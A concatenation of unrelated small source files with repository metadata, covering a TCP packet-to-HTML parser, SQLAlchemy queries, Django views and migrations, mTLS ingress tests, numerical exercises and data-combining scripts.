TCPPacketDict['DATA (16 BITS)'] = int(TCPPacketBin[480:],2)
if (TCPPacketLength>160):
TCPPacketDict['OPTION AND PADDING (UP TO 40 BYTES)'] = int(TCPPacketBin[160:480],2)
if ((TCPPacketLength>160) and (TCPPacketLength<=480)):
TCPPacketDict['OPTION AND PADDING (UP TO 40 BYTES)'] = int(TCPPacketBin[160:],2)
fd = open('TCPPacket.html','w')
html_content = []
html_content.append("<!DOCTYPE html>\n<html>\n<head>\n<style>\ntable, th, td \n{ \n border: 1px solid black; \n border-collapse: collapse; \n}\n ")
html_content.append("th, td \n{\npadding: 5px;\ntext-align: center;\n}\n</style>\n</head>\n<body>\n")
html_content.append("<table " + 'style="width:100%"'+ ">\n")
for keys in TCPPacketDict:
html_content.append("<tr>\n")
html_content.append("<th>")
html_content.append(str(keys))
html_content.append("</th>\n")
html_content.append("<td>")
html_content.append(str(TCPPacketDict[str(keys)]))
html_content.append("</td>\n")
html_content.append("</tr>\n")
html_content.append("</table>\n\n")
html_content.append("</body>\n</html>")
s = "".join(html_content)
fd.write(s)
fd.close()
|
[
"xingengwang@gmail.com"
] |
xingengwang@gmail.com
|
a68b49e307aabca75afa62efbf275e2565c23f41
|
e0c6058dfcb9f0ffe4513f40c04587a6d3f19491
|
/src/search_query.py
|
7f9425e1cf6c44a990259fb97b9493ca0077bc09
|
[
"MIT"
] |
permissive
|
islamariya/SQLAlchemy_blog_model
|
e4a859430aeb343592d207ff75f2c69f2314df74
|
6ad13d20fea3bcce781f6c1c6158d8581a6fdf03
|
refs/heads/master
| 2020-12-18T11:31:16.041456
| 2020-01-21T15:05:00
| 2020-01-21T15:05:00
| 235,364,143
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,606
|
py
|
"""This module """
from sqlalchemy import func
from sqlalchemy.exc import OperationalError
from DatabaseModels import User, Posts, tag_posts_relation
from db_operations import create_db_connection
from logs import logging
def get_user_posts(session, username, tags_qt):
"""This func loads from DB posts of particular user which have at least tags_qt tags.
:param session:
:param username: string, User, whose posts you want to get
:param tags_qt: int, min qt of tags post should have to be selected
:return list of tuples (post_id, Post title, post's tags number)
"""
is_user_exist = session.query(User.user_name).filter(User.user_name == username).first()
if is_user_exist:
posts_found = session.query(Posts, func.count(tag_posts_relation.c.post_id).label("TagsNum")
).join(tag_posts_relation, User).group_by(Posts).filter(User.user_name == username
).having(
func.count(tag_posts_relation.c.post_id) >= tags_qt).all()
return posts_found
else:
print(f"Пользователя {username} в БД нет")
def print_results(posts_found, username, tags_qt):
"""This function prints the search results in console
:param my_query: list of results found get_user_posts
:param username: string, User, whose posts you want to get
:param tags_qt: int, min qt of tags post should have to be selected
"""
successful_message = f"У пользователя {username} найдено {len(posts_found)} постов с {tags_qt} тегами и больше \n" \
f"Список постов и кол-во тегов:"
zero_result_found_message = f"Постов с {tags_qt} тегами у пользователя {username} не найдено."
message_to_print = successful_message if len(posts_found) > 0 else zero_result_found_message
print(message_to_print)
for result in posts_found:
print(result)
if __name__ == "__main__":
session = create_db_connection()
username = "Alise"
tags_qt = 5
try:
posts_found = get_user_posts(session, username, tags_qt)
print_results(posts_found, username, tags_qt)
except TypeError:
logging.exception("TypeError")
print("Ничего не найдено")
except OperationalError:
logging.exception("OperationalError")
print(f"БД сйчас недоступна")
|
[
"noreply@github.com"
] |
islamariya.noreply@github.com
|
a6884354d282244a4a813c04d18cc5a0438e47fb
|
26a0f3a7338acc9ccc9a0b792dd96125ca6768cd
|
/tensor_2.0/Mean_Squared_Error.py
|
9632cb5e179c2b174227b48a92cb8eac4fa697b2
|
[] |
no_license
|
mildsalmon/AI
|
dc6b04b0087d20ae4fbbe2e633eaf0c34ee2dd4f
|
d0ce6911fd05ca3b66018cc170d16c6575924a33
|
refs/heads/master
| 2023-02-11T17:51:37.659955
| 2021-01-12T12:45:00
| 2021-01-12T12:45:00
| 281,025,489
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 581
|
py
|
import numpy as np
fake_a_b = [3, 76]
data = [[2, 81], [4, 93], [6, 91], [8, 97]]
x = [i[0] for i in data]
y = [i[1] for i in data]
def predict(x):
return fake_a_b[0]*x + fake_a_b[1]
def mse(y, y_hat):
return ((y-y_hat) ** 2).mean()
def mse_val(y, predict_result):
return mse(np.array(y), np.array(predict_result))
predict_result = []
for i in range(len(x)):
predict_result.append(predict(x[i]))
print("공부시간={0}, 실제 점수={1}, 예측 점수={2}".format(x[i], y[i], predict(x[i])))
print("mse 최종값: " + str(mse_val(predict_result, y)))
|
[
"mildsalmon@gmail.com"
] |
mildsalmon@gmail.com
|
ba3beb43a9252d7603decdc7295f28feed347ec6
|
321595b04de9bf1def15f12351a36f271b18d7ce
|
/checkpathsum.py
|
cd389846f30348d2ed3be7906a10c846d9a2203c
|
[] |
no_license
|
yashkantharia/random-codes
|
e199162b2b55295bdcb8aa744a82fd2ca1856fcd
|
4ee18a0dcddd7f6e650e1a14c63d2db51e489113
|
refs/heads/master
| 2020-04-22T01:06:41.100619
| 2019-02-10T17:21:31
| 2019-02-10T17:21:31
| 170,003,890
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,291
|
py
|
#create a constructor for tree
class node:
def __init__(self, data =None):
self.data = data
self.left = None
self.right = None
#make a tree like the example tree given below
# 1
# / \
# 2 3
# / \ / \
# 4 5 6 7
root = node(1)
root.left = node(2)
root.right = node(3)
root.left.left = node(4)
root.left.right = node(5)
root.right.left = node(6)
root.right.right = node(7)
print("Enter a number to check with path sum:")
n = int(input())
s=0
#list to contain the path sums
ans=[]
#function to check path sum
# recursively call to check each path
def pathsum(node,s):
if node is None:
print("Empty tree")
else:
s = s + node.data
if node.left is not None:
pathsum(node.left,s)
if node.right is not None:
pathsum(node.right,s)
if node.left is not None and node.right is not None:
s = 0
if s!=0:
ans.append(s)
#call pathsum fucntion to check if the input is equal to any path sum of tree
pathsum(root,s)
if n in ans:
print(True)
else:
print(False)
"""
Output for correct input:
Enter a number to check with path sum:
7
True
Output for incorrect input:
Enter a number to check with path sum:
13
False
"""
|
[
"noreply@github.com"
] |
yashkantharia.noreply@github.com
|
1e896a3e1dd3d8100732c80806419a4517e7da8a
|
663c108dca9c4a30b7dfdc825a8f147ba873da52
|
/venv/tuple/15Packing.py
|
10387419da3a2d58be9a9255e71ee07e4b029004
|
[] |
no_license
|
ksrntheja/08-Python-Core
|
54c5a1e6e42548c10914f747ef64e61335e5f428
|
b5fe25eead8a0fcbab0757b118d15eba09b891ba
|
refs/heads/master
| 2022-10-02T04:11:07.845269
| 2020-06-02T15:23:18
| 2020-06-02T15:23:18
| 261,644,116
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 167
|
py
|
a = 10
b = 20
c = 30
d = 40
t = a, b, c, d
print(t, type(t))
l = [a, b, c, d]
print(l, type(l))
# (10, 20, 30, 40) <class 'tuple'>
# [10, 20, 30, 40] <class 'list'>
|
[
"srntkolla@gmail.com"
] |
srntkolla@gmail.com
|
40a0a59fd8a5da590b1c6cc161235daab309d51b
|
859368aa97ed48f6d8a4f5e87e266fc6bc82fc40
|
/examples/python/sendmore.py
|
213eafb1cb7dc9a1f0c02cc35f363ac9c4b6e2d8
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
simonlynen/or-tools
|
d93cac78ff7bb56643fea03a0c8ddac141e34f8d
|
dde4ed7e1d1996d70657ca106c9d8ca81e138f65
|
refs/heads/master
| 2020-12-11T02:14:58.849479
| 2015-07-22T12:57:01
| 2015-07-22T12:57:01
| 39,518,091
| 1
| 1
| null | 2015-07-22T16:47:22
| 2015-07-22T16:47:22
| null |
UTF-8
|
Python
| false
| false
| 1,840
|
py
|
# Copyright 2010-2014 Google
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Send + more = money.
In this model, we try to solve the following cryptarythm
SEND + MORE = MONEY
Each letter corresponds to one figure and all letters have different values.
"""
from google.apputils import app
import gflags
from ortools.constraint_solver import pywrapcp
FLAGS = gflags.FLAGS
def main(unused_argv):
# Create the solver.
solver = pywrapcp.Solver('SEND + MORE = MONEY')
digits = range(0, 10)
s = solver.IntVar(digits, 's')
e = solver.IntVar(digits, 'e')
n = solver.IntVar(digits, 'n')
d = solver.IntVar(digits, 'd')
m = solver.IntVar(digits, 'm')
o = solver.IntVar(digits, 'o')
r = solver.IntVar(digits, 'r')
y = solver.IntVar(digits, 'y')
letters = [s, e, n, d, m, o, r, y]
solver.Add(
1000 * s + 100 * e + 10 * n + d +
1000 * m + 100 * o + 10 * r + e ==
10000 * m + 1000 * o + 100 * n + 10 * e + y)
# pylint: disable=g-explicit-bool-comparison
solver.Add(s != 0)
solver.Add(m != 0)
solver.Add(solver.AllDifferent(letters))
solver.NewSearch(solver.Phase(letters,
solver.INT_VAR_DEFAULT,
solver.INT_VALUE_DEFAULT))
solver.NextSolution()
print letters
solver.EndSearch()
if __name__ == '__main__':
app.run()
|
[
"lperron@google.com@59fed7e4-672f-1a80-1451-5ac2ff6d83f1"
] |
lperron@google.com@59fed7e4-672f-1a80-1451-5ac2ff6d83f1
|
3a9e9633406dc732d998cf457a907e6d099b412a
|
0a7a5fb8a66d7b71df0ed04bd2c23d1599cd1b59
|
/api/migrations/0012_employee_performance_review.py
|
8040b7869612e4af4ac6adbb7369b6b0ac951d84
|
[] |
no_license
|
hanq08/EmployeeAPI
|
05212a99d156e4ed553d5a7f6c45c12e1cad0d89
|
d0ac1b4b4c513fbecd706b0c1136c569e9b5e6f1
|
refs/heads/master
| 2021-01-16T00:42:55.124879
| 2017-08-11T16:19:34
| 2017-08-11T16:19:34
| 99,975,894
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 607
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-08-10 15:33
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0011_remove_employee_performance_review'),
]
operations = [
migrations.AddField(
model_name='employee',
name='performance_review',
field=models.IntegerField(default=3, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(5)]),
),
]
|
[
"tqhan317@gmail.com"
] |
tqhan317@gmail.com
|
295c9120d6d7eca5a2c916ae12196fac0cdc2e59
|
8d8dd2a5c490e912f957f4afe9d6d02da673805c
|
/Python/Django/djangoFullStack/DojoReads/DojoReads/readsApp/views.py
|
0d32fd305d3f2b6061eea29e90e9db8069965e0a
|
[] |
no_license
|
sunset375/CodingDojo-1
|
ea025ad90e36bfb6d6ef6bcfaa49e286823299cd
|
c5e483f5009942792c04eb2fa3fea83e5b91b5a2
|
refs/heads/master
| 2023-05-16T10:00:00.060738
| 2020-09-12T04:09:08
| 2020-09-12T04:09:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,772
|
py
|
from django.shortcuts import render, HttpResponse, redirect
from django.contrib import messages
from .models import Book, Author, Review
from loginApp.models import User
# Create your views here.
def index(request):
if 'user_id' not in request.session:
return redirect('/')
else:
user = User.objects.get(id=request.session['user_id'])
context = {
'user': user,
'reviews': reversed(Review.objects.all()),
'all_books': Book.objects.all(),
}
return render(request, 'books.html', context)
# add a book and review
def add(request):
if 'user_id' not in request.session:
return redirect('/')
else:
context = {
'all_authors': Author.objects.all()
}
return render(request, 'create.html', context)
#add books works
def create(request):
if 'user_id' not in request.session:
return redirect('/')
else:
user = User.objects.get(id=request.session['user_id'])
if (len(request.POST['new_author']) > 1):
author = Author.objects.create(name=request.POST['new_author'])
else:
author = Author.objects.filter(name=request.POST['authors_dropdown'])
book = Book.objects.create(
title=request.POST['title'],
author=author)
Review.objects.create(
review=request.POST['review'],
rating=request.POST['rating'],
book=book,
user=user,
)
# book.reviews.add(review)
return redirect('/books')
# view all books with reviews and ratings
def rating(request, bookId):
if 'user_id' not in request.session:
return redirect('/')
context = {
'book': Book.objects.get(id=bookId),
'reviews': Book.objects.get(id=bookId).review.all(),
}
return render(request, 'ratings.html', context)
def postRating(request, bookId):
if 'user_id' not in request.session:
return redirect('/')
else:
user = User.objects.get(id=request.session['user_id'])
book = Book.objects.filter(id=bookId)[0]
Review.objects.create(
review=request.POST['review'],
rating=request.POST['rating'],
book=book,
user=user,
)
return redirect(f'/books/{bookId}')
# end of Ratings Page Actions
def delete(request, bookId, reviewId):
if 'user_id' not in request.session:
return redirect('/')
review = Review.objects.filter(id=reviewId)[0]
if review.user.id != request.session['user_id']:
return redirect(f'/books/{bookId}')
review.delete()
return redirect(f'/books/{bookId}')
def logout(request):
request.session.flush()
return redirect('/')
|
[
"javierjcjr@gmail.com"
] |
javierjcjr@gmail.com
|
9af185bb44b26e788f38c9a1fe411f20f03654cf
|
c00a378d2d001588d805757d61114041dac6c36e
|
/backend/migrations/0006_auto_20151125_0940.py
|
c33545773860c2901866260590b576941a00baf0
|
[] |
no_license
|
millanp/backwatershouse
|
887881d191c64f81c777da21a5da92d546160d14
|
277c1318cf383c091148a0be346e3932c376de26
|
refs/heads/master
| 2021-01-21T15:57:53.924675
| 2019-03-16T00:44:06
| 2019-03-16T00:44:06
| 44,445,440
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,070
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.contrib.postgres.operations import HStoreExtension
from django.contrib.postgres.fields.hstore import HStoreField
class Migration(migrations.Migration):
dependencies = [
('backend', '0005_auto_20151109_0118'),
]
operations = [
HStoreExtension(),
migrations.AddField(
model_name='booking',
name='booking_event_id',
field=HStoreField(null=True, blank=True),
),
migrations.AddField(
model_name='booking',
name='request_event_id',
field=models.TextField(null=True, blank=True),
),
migrations.AlterField(
model_name='room',
name='booking_cal_id',
field=models.TextField(null=True, blank=True),
),
migrations.AlterField(
model_name='room',
name='request_cal_id',
field=models.TextField(null=True, blank=True),
),
]
|
[
"millan.philipose@gmail.com"
] |
millan.philipose@gmail.com
|
587fbbefba3edb82272526c8693e25b0cc930cae
|
4f8d205d805b23643b7932a5edd420b8be703e9f
|
/test/test_fitter.py
|
9e9e788c213b3fdec4a386bfe76f3a99f29b6965
|
[] |
no_license
|
raijinspecial/fitter
|
ec8dd42f1e139c6ea8d794c610506eca1ff38b1c
|
852253047ce94ed61b809e12fc499d7e360190b8
|
refs/heads/master
| 2020-05-04T06:05:18.093777
| 2019-01-27T11:41:22
| 2019-01-27T11:41:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 909
|
py
|
from fitter import Fitter
def test_fitter():
f = Fitter([1,1,1,2,2,2,2,2,3,3,3,3], distributions=['gamma'], xmin=0, xmax=4)
f.fit()
f.summary()
assert f.xmin == 0
assert f.xmax == 4
# reset the range:
f.xmin = None
f.xmax = None
assert f.xmin == 1
assert f.xmax == 3
f = Fitter([1,1,1,2,2,2,2,2,3,3,3,3], distributions=['gamma'])
f.fit()
f.summary()
assert f.xmin == 1
assert f.xmax == 3
def test_gamma():
from scipy import stats
data = stats.gamma.rvs(2, loc=1.5, scale=2, size=10000)
f = Fitter(data, bins=100)
f.xmin = -10 #should have no effect
f.xmax = 1000000 # no effet
f.xmin=0.1
f.xmax=10
f.distributions = ['gamma', "alpha"]
f.fit()
df = f.summary()
assert len(df)
f.plot_pdf(names=["gamma"])
f.plot_pdf(names="gamma")
res = f.get_best()
assert "gamma" in res.keys()
|
[
"cokelaer@gmail.com"
] |
cokelaer@gmail.com
|
766ceea77cef0b70330acf34547f317c4d09a8a3
|
108235b7b669d99ffc6748fe305dd6841beb6088
|
/PythonModule/geflight/transform/combining_metar.py
|
2ada326ffd051081ca274c18237d27b2d975402f
|
[
"BSD-2-Clause"
] |
permissive
|
noahvanhoucke/GEFlightQuest
|
38a5ea5b6b52d7c350de37b5c87a97512a48a450
|
4d59313df32d9c2cd6d8bddf37b1b0c22512c275
|
refs/heads/master
| 2021-01-18T10:00:01.647533
| 2013-07-24T21:13:51
| 2013-07-24T21:13:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 907
|
py
|
import pandas
import os
folder = os.path.join(os.environ["DataPath"], "GEFlight", "RawFinalEvaluationSet", "Metar", "flightstats_metar")
def combine_metars(base_name):
print base_name
base = pandas.read_csv(folder + base_name + ".csv")
archive = pandas.read_csv(folder + base_name + "archive.csv")
base['metar_reports_id'] = map(lambda x: -x, base['metar_reports_id'])
print archive.columns
if 'metar_reports_id' in archive.columns:
print 'dropping metar_reports_id'
archive = archive.drop(['metar_reports_id'], axis=1)
print "columns:"
print archive.columns
archive = archive.rename(columns = {'metar_reports_archive_id' : 'metar_reports_id'})
combined = base.append(archive, ignore_index = True)
combined.to_csv(folder + base_name + "_combined.csv", index=False)
combine_metars("presentconditions")
combine_metars("reports")
combine_metars("runwaygroups")
combine_metars("skyconditions")
|
[
"ben@benhamner.com"
] |
ben@benhamner.com
|
e9874685fd7aff4ffd78f21e48c8b652f659429b
|
0835f2f9dc2b9076704138ccb92af47e8fad1b98
|
/venv/Scripts/easy_install-script.py
|
1e90971ddd447c23655f546806db10dc2d4cd1d7
|
[] |
no_license
|
eberber/Python-Labs
|
5049b51afcd3ad2b82703974ba23b935d6f337c4
|
78e5b8f2a28d907c993a42dabe57dcf84d07c465
|
refs/heads/master
| 2021-06-08T10:50:29.061152
| 2021-04-08T03:19:59
| 2021-04-08T03:19:59
| 147,609,255
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 456
|
py
|
#!C:\Users\eberber97\PycharmProjects\TextTwist\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install')()
)
|
[
"e_berber@u.pacific.edu"
] |
e_berber@u.pacific.edu
|
34a4a4e9d06fc2c477650f527a64221e1af2e5d3
|
05e45d98fb3ccfff37c480d47e53f913903b8d29
|
/tests/suite/test_ingress_mtls.py
|
0ae45a8153d24c3ba23f37b8fa379acd00b87b1a
|
[
"Apache-2.0"
] |
permissive
|
gamunu/kubernetes-ingress
|
028e329b763040894352270dd51b280a6519ca66
|
10513a4b4b8e2f36c395b0e304391ea8d96dc960
|
refs/heads/master
| 2023-09-05T17:01:13.635827
| 2021-11-11T03:26:11
| 2021-11-11T03:26:11
| 426,876,243
| 2
| 0
|
Apache-2.0
| 2021-11-11T05:00:47
| 2021-11-11T05:00:47
| null |
UTF-8
|
Python
| false
| false
| 10,188
|
py
|
import mock
import pytest
import requests
from suite.resources_utils import (
wait_before_test,
create_secret_from_yaml,
delete_secret,
)
from suite.ssl_utils import create_sni_session
from suite.vs_vsr_resources_utils import (
read_vs,
read_vsr,
patch_virtual_server_from_yaml,
patch_v_s_route_from_yaml,
)
from suite.policy_resources_utils import (
create_policy_from_yaml,
delete_policy,
)
from settings import TEST_DATA
std_vs_src = f"{TEST_DATA}/virtual-server/standard/virtual-server.yaml"
std_vsr_src = f"{TEST_DATA}/virtual-server-route/route-multiple.yaml"
std_vs_vsr_src = f"{TEST_DATA}/virtual-server-route/standard/virtual-server.yaml"
mtls_sec_valid_src = f"{TEST_DATA}/ingress-mtls/secret/ingress-mtls-secret.yaml"
tls_sec_valid_src = f"{TEST_DATA}/ingress-mtls/secret/tls-secret.yaml"
mtls_pol_valid_src = f"{TEST_DATA}/ingress-mtls/policies/ingress-mtls.yaml"
mtls_pol_invalid_src = f"{TEST_DATA}/ingress-mtls/policies/ingress-mtls-invalid.yaml"
mtls_vs_spec_src = f"{TEST_DATA}/ingress-mtls/spec/virtual-server-mtls.yaml"
mtls_vs_route_src = f"{TEST_DATA}/ingress-mtls/route-subroute/virtual-server-mtls.yaml"
mtls_vsr_subroute_src = f"{TEST_DATA}/ingress-mtls/route-subroute/virtual-server-route-mtls.yaml"
mtls_vs_vsr_src = f"{TEST_DATA}/ingress-mtls/route-subroute/virtual-server-vsr.yaml"
crt = f"{TEST_DATA}/ingress-mtls/client-auth/valid/client-cert.pem"
key = f"{TEST_DATA}/ingress-mtls/client-auth/valid/client-key.pem"
invalid_crt = f"{TEST_DATA}/ingress-mtls/client-auth/invalid/client-cert.pem"
invalid_key = f"{TEST_DATA}/ingress-mtls/client-auth/invalid/client-cert.pem"
def setup_policy(kube_apis, test_namespace, mtls_secret, tls_secret, policy):
print(f"Create ingress-mtls secret")
mtls_secret_name = create_secret_from_yaml(kube_apis.v1, test_namespace, mtls_secret)
print(f"Create ingress-mtls policy")
pol_name = create_policy_from_yaml(kube_apis.custom_objects, policy, test_namespace)
print(f"Create tls secret")
tls_secret_name = create_secret_from_yaml(kube_apis.v1, test_namespace, tls_secret)
return mtls_secret_name, tls_secret_name, pol_name
def teardown_policy(kube_apis, test_namespace, tls_secret, pol_name, mtls_secret):
print("Delete policy and related secrets")
delete_secret(kube_apis.v1, tls_secret, test_namespace)
delete_policy(kube_apis.custom_objects, pol_name, test_namespace)
delete_secret(kube_apis.v1, mtls_secret, test_namespace)
@pytest.mark.policies
@pytest.mark.parametrize(
    "crd_ingress_controller, virtual_server_setup",
    [
        (
            {
                "type": "complete",
                "extra_args": [
                    f"-enable-leader-election=false",
                    f"-enable-preview-policies",
                ],
            },
            {
                "example": "virtual-server",
                "app_type": "simple",
            },
        )
    ],
    indirect=True,
)
class TestIngressMtlsPolicyVS:
    # Cases: (policy manifest, VS manifest, expected HTTP code, expected body
    # fragment, expected VS status message fragment, expected VS state).
    @pytest.mark.parametrize(
        "policy_src, vs_src, expected_code, expected_text, vs_message, vs_state",
        [
            # Valid policy referenced from the VS spec context -> request OK.
            (
                mtls_pol_valid_src,
                mtls_vs_spec_src,
                200,
                "Server address:",
                "was added or updated",
                "Valid",
            ),
            # Valid policy referenced from a route context -> not allowed.
            (
                mtls_pol_valid_src,
                mtls_vs_route_src,
                500,
                "Internal Server Error",
                "is not allowed in the route context",
                "Warning",
            ),
            # Broken policy in the spec context -> Warning state.
            (
                mtls_pol_invalid_src,
                mtls_vs_spec_src,
                500,
                "Internal Server Error",
                "is missing or invalid",
                "Warning",
            ),
        ],
    )
    @pytest.mark.smoke
    def test_ingress_mtls_policy(
        self,
        kube_apis,
        crd_ingress_controller,
        virtual_server_setup,
        test_namespace,
        policy_src,
        vs_src,
        expected_code,
        expected_text,
        vs_message,
        vs_state,
    ):
        """
        Test ingress-mtls with valid and invalid policy in vs spec and route contexts.
        """
        session = create_sni_session()
        mtls_secret, tls_secret, pol_name = setup_policy(
            kube_apis,
            test_namespace,
            mtls_sec_valid_src,
            tls_sec_valid_src,
            policy_src,
        )
        print(f"Patch vs with policy: {policy_src}")
        patch_virtual_server_from_yaml(
            kube_apis.custom_objects,
            virtual_server_setup.vs_name,
            vs_src,
            virtual_server_setup.namespace,
        )
        wait_before_test()
        # The request always carries the valid client certificate; only the
        # policy manifest and the VS context vary between cases.
        resp = session.get(
            virtual_server_setup.backend_1_url_ssl,
            cert=(crt, key),
            headers={"host": virtual_server_setup.vs_host},
            allow_redirects=False,
            verify=False,
        )
        vs_res = read_vs(kube_apis.custom_objects, test_namespace, virtual_server_setup.vs_name)
        # Clean up and restore the standard VS *before* asserting so a failed
        # assertion does not leak state into later tests.
        teardown_policy(kube_apis, test_namespace, tls_secret, pol_name, mtls_secret)
        patch_virtual_server_from_yaml(
            kube_apis.custom_objects,
            virtual_server_setup.vs_name,
            std_vs_src,
            virtual_server_setup.namespace,
        )
        assert (
            resp.status_code == expected_code
            and expected_text in resp.text
            and vs_message in vs_res["status"]["message"]
            and vs_res["status"]["state"] == vs_state
        )
    # Cases: (certificate passed to requests, expected HTTP code, expected body
    # fragment, substring expected in the raised SSLError — "" when no error).
    @pytest.mark.parametrize(
        "certificate, expected_code, expected_text, exception",
        [
            ((crt, key), 200, "Server address:", ""),
            ("", 400, "No required SSL certificate was sent", ""),
            ((invalid_crt, invalid_key), "None", "None", "Caused by SSLError"),
        ],
    )
    def test_ingress_mtls_policy_cert(
        self,
        kube_apis,
        crd_ingress_controller,
        virtual_server_setup,
        test_namespace,
        certificate,
        expected_code,
        expected_text,
        exception,
    ):
        """
        Test ingress-mtls with valid and invalid policy
        """
        session = create_sni_session()
        mtls_secret, tls_secret, pol_name = setup_policy(
            kube_apis,
            test_namespace,
            mtls_sec_valid_src,
            tls_sec_valid_src,
            mtls_pol_valid_src,
        )
        print(f"Patch vs with policy: {mtls_pol_valid_src}")
        patch_virtual_server_from_yaml(
            kube_apis.custom_objects,
            virtual_server_setup.vs_name,
            mtls_vs_spec_src,
            virtual_server_setup.namespace,
        )
        wait_before_test()
        ssl_exception = ""
        resp = ""
        try:
            resp = session.get(
                virtual_server_setup.backend_1_url_ssl,
                cert=certificate,
                headers={"host": virtual_server_setup.vs_host},
                allow_redirects=False,
                verify=False,
            )
        except requests.exceptions.SSLError as e:
            # A rejected client certificate surfaces as an SSLError rather
            # than an HTTP response; record it and fake a response object so
            # the shared assertion below still applies.
            print(f"SSL certificate exception: {e}")
            ssl_exception = str(e)
            resp = mock.Mock()
            resp.status_code = "None"
            resp.text = "None"
        teardown_policy(kube_apis, test_namespace, tls_secret, pol_name, mtls_secret)
        patch_virtual_server_from_yaml(
            kube_apis.custom_objects,
            virtual_server_setup.vs_name,
            std_vs_src,
            virtual_server_setup.namespace,
        )
        assert (
            resp.status_code == expected_code
            and expected_text in resp.text
            and exception in ssl_exception
        )
@pytest.mark.policies
@pytest.mark.parametrize(
    "crd_ingress_controller, v_s_route_setup",
    [
        (
            {
                "type": "complete",
                "extra_args": [
                    f"-enable-leader-election=false",
                    f"-enable-preview-policies",
                ],
            },
            {"example": "virtual-server-route"},
        )
    ],
    indirect=True,
)
class TestIngressMtlsPolicyVSR:
    def test_ingress_mtls_policy_vsr(
        self,
        kube_apis,
        crd_ingress_controller,
        v_s_route_app_setup,
        v_s_route_setup,
        test_namespace,
    ):
        """
        Test ingress-mtls in vsr subroute context.
        """
        # Per the assertion below, referencing an ingress-mtls policy from a
        # VSR subroute must leave the VSR in Warning state with a
        # "not allowed in the subroute context" message.
        mtls_secret, tls_secret, pol_name = setup_policy(
            kube_apis,
            v_s_route_setup.route_m.namespace,
            mtls_sec_valid_src,
            tls_sec_valid_src,
            mtls_pol_valid_src,
        )
        print(
            f"Patch vsr with policy: {mtls_vsr_subroute_src} and vs with tls secret: {tls_secret}"
        )
        patch_virtual_server_from_yaml(
            kube_apis.custom_objects,
            v_s_route_setup.vs_name,
            mtls_vs_vsr_src,
            v_s_route_setup.namespace,
        )
        patch_v_s_route_from_yaml(
            kube_apis.custom_objects,
            v_s_route_setup.route_m.name,
            mtls_vsr_subroute_src,
            v_s_route_setup.route_m.namespace,
        )
        wait_before_test()
        vsr_res = read_vsr(
            kube_apis.custom_objects,
            v_s_route_setup.route_m.namespace,
            v_s_route_setup.route_m.name,
        )
        # Restore the standard VSR/VS before asserting so a failure does not
        # leak state into later tests.
        teardown_policy(
            kube_apis, v_s_route_setup.route_m.namespace, tls_secret, pol_name, mtls_secret
        )
        patch_v_s_route_from_yaml(
            kube_apis.custom_objects,
            v_s_route_setup.route_m.name,
            std_vsr_src,
            v_s_route_setup.route_m.namespace,
        )
        patch_virtual_server_from_yaml(
            kube_apis.custom_objects,
            v_s_route_setup.vs_name,
            std_vs_vsr_src,
            v_s_route_setup.namespace,
        )
        assert (
            vsr_res["status"]["state"] == "Warning"
            and f"{pol_name} is not allowed in the subroute context" in vsr_res["status"]["message"]
        )
|
[
"noreply@github.com"
] |
gamunu.noreply@github.com
|
5c32aa116045d822f41e3135a9671d6eead08b0b
|
e96cf20ccf9a288ab9516f748c17948a96d46048
|
/GaussJacobi.py
|
a69c56c5797aa55b3324af7f43570d6ecdd407b6
|
[
"MIT"
] |
permissive
|
dcalds/MetodosNumericos
|
7e4ee31f6618d156ad158485d5246510ad9daf67
|
8fd9161119a5bb6aaf393c39d301f6063cbeaa54
|
refs/heads/master
| 2020-04-17T15:51:55.389109
| 2019-02-11T14:14:06
| 2019-02-11T14:14:06
| 166,716,632
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 988
|
py
|
# Algoritimo 08 - Gauss Jacobi
def showMatrix(M):
    """Print each row of matrix M on its own line, followed by a blank line."""
    for row in M:
        print(row)
    print()
def gaussJ(A, b):
    """Solve the linear system A·x = b with the Gauss-Jacobi iterative method.

    A: square coefficient matrix (list of lists); the iteration converges for
       diagonally dominant systems.
    b: right-hand-side vector, len(b) == len(A).
    Returns the solution vector once the largest component-wise change between
    iterations drops below the tolerance `e`, or an error string if the
    iteration limit N is reached without converging.
    """
    N = 500      # iteration limit
    e = 0.001    # convergence tolerance (max absolute change per component)
    n = len(A)
    # Initial guesses — generalized from the hard-coded [0,0,0], which made
    # the function crash with IndexError for any system larger than 3x3.
    xo = [0] * n
    k = 1
    x = [0 for i in range(n)]
    while k <= N:
        for i in range(n):
            soma = 0
            for j in range(n):
                if j != i:
                    soma += A[i][j] * xo[j]
            x[i] = (b[i] - soma) / A[i][i]
        # Convergence check: largest absolute change of any component.
        X = []
        for a in range(n):
            X.append(abs(x[a] - xo[a]))
        if max(X) < e:
            return x
        k += 1
        for i in range(n):
            xo[i] = x[i]
